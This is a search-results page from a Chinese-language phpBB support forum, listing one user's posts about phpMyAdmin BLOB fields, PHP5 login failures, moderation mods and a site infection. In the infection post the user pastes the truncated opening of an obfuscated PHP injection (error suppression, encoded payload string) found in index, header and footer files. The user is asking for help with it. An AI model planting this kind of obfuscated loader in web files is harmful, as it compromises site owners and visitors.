有 197 筆資料符合您搜尋的條件

oscerropper
2012-03-04 13:13
版面: [3.0.x] 安裝與使用
主題: 網站被植入惡意程式?
回覆: 3
觀看: 3422

Re: 網站被植入惡意程式?

這個問題應該是出在 WordPress,連帶的也影響了 phpBB。 建議您,試著更新 WordPress 的外掛(contact-form-7)版本。 參考連結: http://wewatchyourwebsite.com/wordpress/2011/11/wordpress-websites-infected-through-outdated-contact-form-7-plugin/ p.s. 1. 移動至「phpBB 3 安裝與使用」版面。 2. 請適時更新您的 phpBB 3 版本。 hello 感謝您 我的主頁面是wordpress,再透過wp phpbb bridge來橋接...
oscerropper
2012-03-03 20:37
版面: [3.0.x] 安裝與使用
主題: 網站被植入惡意程式?
回覆: 3
觀看: 3422

網站被植入惡意程式?

hello 關於這幾天我的網站被植入惡意程式在特定的檔案內 導致網頁無法開啟or緩慢 包含index, footer 以及 header.php 檔案中 我網站下所有包含這三個檔案名稱的php files都被植入,不僅僅包含phpbb,也包含了wordpress 可否幫我檢查這段程式是否是被植入還是另有原因? <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0Z...
oscerropper
2011-04-01 01:59
版面: [3.0.x] 外掛問題討論
主題: 尋找Blog for phpBB3
回覆: 5
觀看: 6077

Re: 尋找Blog for phpBB3

謝謝各位回答

@mdtom
主要是想放一些新聞資訊之類的文章,連結到phpBB論壇,而回覆者(users)也可以與phpBB資料庫連結,所以我才想嘗試之前wordpress+phpBB橋接的mod。

Joomla我最近開始會來架設玩玩 xD,等有時間的話,畢竟裝一個mod比較快 >//<
oscerropper
2011-03-25 14:56
版面: [3.0.x] 外掛問題討論
主題: 尋找Blog for phpBB3
回覆: 5
觀看: 6077

Re: 尋找Blog for phpBB3

Barlos 寫:Joomla 當 Blog 如何?

可參考這邊的顯示.
http://www.joomla123.com.tw/
Hi Barlos

我知道joomla,只是我比較取向找phpbb的mod,不然也有其他選擇 xD
oscerropper
2011-03-24 15:22
版面: [3.0.x] 外掛問題討論
主題: 尋找Blog for phpBB3
回覆: 5
觀看: 6077

尋找Blog for phpBB3

Hi 其實看了IPB的方便性之後,一度讓我有點想要跳槽到IPB,雖然他的架構之大在於他要付費,而PHPBB免費 Orz,不過我還是想要問一下是否有Blog的Mod。 我目前比較取向是網站管理員的Blog的Mod而不是User Blog,我目前知道Wordpress有結合phpBB( http://www.phpbb.com/community/viewtopic.php?f=70&t=544065 )不過該作者已經不開發,被官方列入ABD。 目前我論壇也有裝Portal,不過達不到我要的那種「首頁」用途,如果要重寫一個首頁來指定我要的論壇文章顯示,又太麻煩 Orz,所以我才想說用Blog Mo...
oscerropper
2010-08-30 13:42
版面: [3.0.x] 安裝與使用
主題: [已解決]關於phpmyadmin中的一些錯誤?
回覆: 4
觀看: 3300

Re: 關於phpmyadmin中的一些錯誤?

心靈捕手 寫:我以為:
看到這類「[BLOB - 3Bytes]」的字串,不必質疑;相反地,它可以避免頁面太大,影響資料傳輸。

建議您:
將匯出的 *.sql 再重新載入後,檢視相關 table 是否有誤?
Hi

謝謝,經過測試blob形式可以成功匯入及顯示text。

solved
oscerropper
2010-08-29 23:49
版面: [3.0.x] 安裝與使用
主題: [已解決]關於phpmyadmin中的一些錯誤?
回覆: 4
觀看: 3300

Re: 關於phpmyadmin中的一些錯誤?

心靈捕手 寫:建議您:
升級 phpMyAdmin 為最新(3.3.6)版,看看是否有改善?
Hi

抱歉,我phpmyadmin版本打錯,我的版本已經是3.3.6。由於之前舊版本3.2.4有這問題所以又嘗試了這個。

目前在網路上搜尋到的一些相關教學,都是說到這兩個項目
http://www.contentwithstyle.co.uk/conte ... phpmyadmin

不過目前這方法對我來說沒有用。
oscerropper
2010-08-29 15:06
版面: [3.0.x] 安裝與使用
主題: [已解決]關於phpmyadmin中的一些錯誤?
回覆: 4
觀看: 3300

[已解決]關於phpmyadmin中的一些錯誤?

●主機作業系統:linux ●您安裝的程式:php 5.2.13、mysql 5.0.91、apache 2.0.63、phpmyadmin 3.2.4 ●您的 phpBB 版本:phpBB 3.0.7-PL1 我主要的問題是,我在PHPMYADMIN下看phpbb3_posts跟phpbb3_users下都會看到這類「[BLOB - 3Bytes]」的字串?舉例以在phpbb3_posts的table下,會在post_text欄位看到這問題,而匯出table時*.sql檔裡頭的資料,post_text所屬的地方會變成不是正常的文字 所以以後備份好像會出錯誤?不知道有什麼辦法可以解決?目前我用...
oscerropper
2009-10-11 18:06
版面: [3.0.x] 外掛問題討論
主題: [尋找]有自動鎖定的Mod外掛嘛?
回覆: 4
觀看: 3271

Re: [尋找]有自動鎖定的Mod外掛嘛?

心靈捕手 寫:目前, 尚無相關外掛.
不過, 此需求有被提及, 而且已有解決之道.
你好

其實是有的
我在phpbb官方詢問了,已經找到合適的mod

http://www.phpbb.com/community/viewtopi ... &t=1324895

solved
oscerropper
2009-10-06 19:55
版面: [3.0.x] 外掛問題討論
主題: [尋找]有自動鎖定的Mod外掛嘛?
回覆: 4
觀看: 3271

Re: [尋找]有自動鎖定的Mod外掛嘛?

j0958322080 寫:PHPBB3內有類似的功能
只是是直接刪除文章而已
但可以自己設定幾天過後刪除
我知道那個功能,在版面設定管理就可以實行
只是我想要找的是「鎖定」的Mod,可以一段時間內自動鎖定且保留文章,讓會員不能回應。
oscerropper
2009-10-06 17:41
版面: [3.0.x] 外掛問題討論
主題: [尋找]有自動鎖定的Mod外掛嘛?
回覆: 4
觀看: 3271

[尋找]有自動鎖定的Mod外掛嘛?

as title

是否有可以自動設定天數,在該天數到達時,將該篇文章自動鎖定的MOD文章嘛?
如果有這個Mod,對於一些管理員無法按時鎖定一些時效性文章,應該會滿方便的

謝謝
oscerropper
2009-07-08 13:36
版面: 架站
主題: [問題]Mysql4升級至5使否會造成phpbb3.0.5錯誤?
回覆: 9
觀看: 14988

Re: [問題]Mysql4升級至5使否會造成phpbb3.0.5錯誤?

謝謝心靈捕手說明

不過我目前是使用 mysql 4.1.22,所以登錄不了的問題不是 mysql 版本問題
總而言之,我在請主機商先幫我測試

謝謝
oscerropper
2009-07-08 03:45
版面: 架站
主題: [問題]Mysql4升級至5使否會造成phpbb3.0.5錯誤?
回覆: 9
觀看: 14988

Re: [問題]Mysql4升級至5使否會造成phpbb3.0.5錯誤?

Hi 心靈捕手 我的意思是說,目前我使用的虛擬主機商提供的php預設為 php4,虛擬主機使用者後台可以轉換 php5 我只要使用 php5,phpbb就無法使用,回覆文章時會出現「找不到指定主題」,或是,只要使用到帳號密碼確認的頁面,都無法登錄,確認後帳號密碼送出後還是回到輸入帳號密碼的頁面 不管是重新安裝時的畫面(輸入資料庫帳號、密碼、字串那一個頁面),或是在phpbb都一樣 這個問題是不是虛擬主機商的問題成分較大?php5目前我無法使用,一直都用php4來run phpBB 我以為: 此問題, 與轉換 PHP 5 無關; 而與升級 MySQL 5 有關. 參考連結: http://21...
oscerropper
2009-07-07 20:11
版面: 架站
主題: [問題]Mysql4升級至5使否會造成phpbb3.0.5錯誤?
回覆: 9
觀看: 14988

Re: [問題]Mysql4升級至5使否會造成phpbb3.0.5錯誤?

Hi 心靈捕手

我的意思是說,目前我使用的虛擬主機商提供的php預設為 php4,虛擬主機使用者後台可以轉換 php5
我只要使用 php5,phpbb就無法使用,回覆文章時會出現「找不到指定主題」,或是,只要使用到帳號密碼確認的頁面,都無法登錄,確認後帳號密碼送出後還是回到輸入帳號密碼的頁面

不管是重新安裝時的畫面(輸入資料庫帳號、密碼、字串那一個頁面),或是在phpbb都一樣

這個問題是不是虛擬主機商的問題成分較大?php5目前我無法使用,一直都用php4來run phpBB
oscerropper
2009-07-06 16:29
版面: 架站
主題: [問題]Mysql4升級至5使否會造成phpbb3.0.5錯誤?
回覆: 9
觀看: 14988

Re: [問題]Mysql4升級至5使否會造成phpbb3.0.5錯誤?

Hi 心靈捕手

另外一個問題,由於我是用cpanel內的php組態來選擇php4跟5的轉換,我現在預設的4.1.22版本使用都正常,不過我轉到5後,我只要登出論壇,再來嘗試登入就無法登入論壇,只要不登出,發表文章跟瀏覽版面都正常,轉回php 4話就沒問題。請問有任何解決方法嘛?

我是從phpBB2升級至phpBB3.05,升級有一段時間,原本就想將php4改成php5,結果一直有那個問題 ~_~

前往進階搜尋